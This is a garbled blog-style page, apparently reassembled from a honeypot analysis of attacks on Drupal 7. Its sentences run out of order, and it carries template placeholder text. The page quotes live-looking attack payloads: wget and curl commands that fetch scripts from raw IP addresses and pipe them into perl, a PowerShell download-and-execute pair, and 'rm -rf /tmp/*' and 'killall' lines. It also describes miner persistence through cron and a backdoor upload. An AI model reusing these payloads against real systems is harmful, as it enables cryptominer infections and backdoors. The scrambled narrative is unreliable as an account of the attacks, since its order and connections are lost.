9/22/2023 0 Comments Drupal 7 exploit github![]() ![]() Powershell -Command (New-Object ).DownloadFile('','asdf.exe') (New-Object -com Shell.Application).ShellExecute('asdf.exe') Rm -rf /tmp/* killall -9 crontab wget -qO - 166.63.127.154/asx|perlĪside from many "vulnerability scanner" scripts that echo back a string to show the system is vulnerable, There was also one exploit attempt looking for Drupal running on Windows: Perl Bots Are Still a ThingĪs a Perl fan, it is nice to see that IRC bots written in Perl are still "a thing". We saw about 200 requests like this: The attacker can now come back and upload additional files (backdoors). It downloads a file from Github that implements a simple file upload feature. As usual, it gains persistence by adding a cron job to restart the miner. The configuration file for the miner indicates that it connects to the mining pool on port 444 or 443.and the IP addresses used for far are 188.166.148.89 and 217.182.231.56. These three commands are sent as two distinct exploit requests (first either the "curl" or the "wget" command, then followed by the execution). This exploit downloads a crypto coin miner and then, in a second exploit attempt, starts it. Moving forward, here are some of the top exploit payloads we have seen so far: Miners are #1Ĭurl -o /tmp/.XO-lock 188.166.148.89:53/b.sh?DRUPAL ip address]:80 Kind of odd that this referrer is used and I am not sure how it would evade any filters. We know the referrer is fake because by clicking on a search engine link, you would not send a POST request. Note how it uses a fake referrer ("Baidu"). The first request that is consistent with the exploit arrived on April 13th. ![]() "/user/register" is often used to fingerprint Drupal. The request above is not consistent with the exploit. But the source was a tor endpoint, and it scanned for a wide range of vulnerabilities at the time:ġ85.220.101.21 - "GET /user/register HTTP/1.1" 404 446 "-" "Mozilla/5.0 (Windows NT 5.1 rv:7.0.1) Gecko/20100101 Firefox/7.0.1"Īt the time, our honeypot did not yet emulate Drupal. The very first request for "/user/register" we saw came on April 6th. Ever since then, we are seeing waves of exploit attempts hitting our honeypots. Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |